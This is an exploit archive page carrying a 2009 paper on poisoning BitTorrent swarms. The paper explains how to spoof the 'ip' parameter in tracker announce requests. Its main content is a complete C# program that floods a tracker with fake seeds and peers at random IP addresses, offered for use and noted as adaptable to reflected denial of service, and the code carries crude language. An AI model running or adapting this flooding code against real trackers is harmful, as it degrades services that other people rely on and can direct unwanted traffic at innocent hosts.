what you don't know can hurt you

Torrent Swarm Poisoning

Torrent Swarm Poisoning
Posted Nov 18, 2009
Authored by Burningmace

Paper on poisoning a torrent's peer swarm with large numbers of fake peers, including proof of concept code. Works on most trackers. Could possibly be adapted to perform a reflected denial of service (DRDoS) on a target.

tags | exploit, denial of service, proof of concept
MD5 | 8afc01728654ca2731acc6e2d0166e9b

Torrent Swarm Poisoning

Change Mirror Download
=== Credits ===
Written by Burningmace.
Thanks to Blindkilla for helping me out.

=== Introduction ===
The BitTorrent protocol identifies peers using a tracker. Each peer announces itself to the tracker via HTTP.
Certain parameters in the announce request itself can be altered in order to fake the IP address of the peer.
This can be used to "poison" the torrent by adding thousands of fake peers.

=== The Principle ===
The announce works like this:
http://tracker.example.com/announce?info_hash=<hash>&peer_id=<id>&uploaded=0&downloaded=0&left=<left>&event=<event>&port=<port>&numwant=<n>&ip=<address>
Where:
- <hash> is the infohash of the torrent, escaped.
- <id> is a random 20 character id generated by the client to identify itself.
- <left> is the number of bytes left to download. use 0 when seeding.
- <event> is the type of announce you are issuing. use "completed" if you're seeding, or "started" if downloading.
- <port> is the local port on which your BitTorrent client is accepting connecitons.
- <n> is the number of peers you wish to fetch. keep this low for repeated multiple requests.
- <address> is the IP address that you wish to be bound to.

The address parameter is normally used when users are behind a firewall or NAT router, but for most trackers
it can be set to absolutely anything - including a DNS. An example of a request would be the following:

http://tracker.example.com/announce?info_hash=%e6%8e%c7%d9%64%7a%d3%22%23%8c%e9%81%cb%aa%5a%24%fe%a5%2d%81&peer_id=01020304050607080901&uploaded=0&downloaded=0&left=0&event=completed&port=1234&numwant=5&ip=123.45.67.89

=== Exploiting ===
We can create a program that announces itself repeatedly to the tracker with fake IPs. To get the best out of
this exploit, announce yourself as both seeds and peers. With a broadband connection, you can often add over
a thousand fake peers to the swarm in less than 5 minutes.

=== Example Code ===

/*
*
* This C# code sends hundreds of announce requests per minute.
*
* I know you C fanboys are pulling you hair out right now, but I don't care. C# is the win, bitches.
*
*/
using System;
using System.Collections.Generic;
using System.Text;
using System.Net;
using System.Threading;

namespace SeedFucker
{
class Program
{
static void Main(string[] args)
{
// create a thread pool with 5 threads
List<Thread> tp = new List<Thread>();
for (int i = 0; i < 5; i++)
{
tp.Add(new Thread(TorrentThread));
tp[i].Start();
Thread.Sleep(10);
}
while (true)
{
Thread.Sleep(50);
}
}

static void TorrentThread()
{
// create a web client with a "no cache" policy
WebClient wc = new WebClient();
wc.CachePolicy = new System.Net.Cache.RequestCachePolicy(System.Net.Cache.RequestCacheLevel.BypassCache);

// the infohash of the torrent we want to poison
string hash = "1d7e4cf69af1d88ba426572bfb98c4f603f5d2c1";

// encode the hash
string hashEncoded = "";
for (int i = 0; i < 20; i++)
{
hashEncoded += "%" + hash[i * 2] + hash[(i * 2) + 1];
}

// enter the main loop
while (true)
{
// generate a random IP address
string ip = GenerateIP();
// create a timestamp for display purposes
string time = "[" + DateTime.Now.Hour.ToString().PadLeft(2, '0') + ":" + DateTime.Now.Minute.ToString().PadLeft(2, '0') + ":" + DateTime.Now.Second.ToString().PadLeft(2, '0') + "] ";

// if completed == true then we're pretending to be a seed. otherwise pretend to be a peer
bool completed = (RNG.Next(0, 3) == 0);
string torrentEvent = (completed ? "completed" : "started");
// pick a random size
int left = (completed ? 0 : RNG.Next(1024 * 1024 * 2, 1024 * 1024 * 1024));
// create the url - change the announce url to whatever your particular torrent is using
string url = "http://tracker.example.com/announce?info_hash=" + hashEncoded + "&peer_id=" + RNG.Next(1000000, 9999999).ToString() + RNG.Next(100000, 999999).ToString() + RNG.Next(1000000, 9999999).ToString() + "&port=" + RNG.Next(5000, 32000).ToString() + "&uploaded=0&downloaded=0&left=" + left.ToString() + "&event=" + torrentEvent + "&numwant=5&ip=" + ip;
// attempt the announce
try
{
wc.DownloadData(url);
Console.WriteLine(time + "Sent tracker request: " + (completed ? "Seed" : "Peer") + " [" + ip + "]");
}
catch
{
}
}
}

static string GenerateIP()
{
// generate an IP in the range [50-220].[10-100].[1-255].[1-255]
return RNG.Next(50, 220).ToString() + "." + RNG.Next(10, 100).ToString() + "." + RNG.Next(1, 255).ToString() + "." + RNG.Next(1, 255).ToString();
}
}

class RNG
{
private static Random _rng = new Random();

public static int Next(int min, int max)
{
return _rng.Next(min, max);
}
}
}
Login or Register to add favorites

File Archive:

October 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    16 Files
  • 2
    Oct 2nd
    1 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    24 Files
  • 5
    Oct 5th
    24 Files
  • 6
    Oct 6th
    11 Files
  • 7
    Oct 7th
    14 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    1 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    7 Files
  • 12
    Oct 12th
    15 Files
  • 13
    Oct 13th
    26 Files
  • 14
    Oct 14th
    10 Files
  • 15
    Oct 15th
    6 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close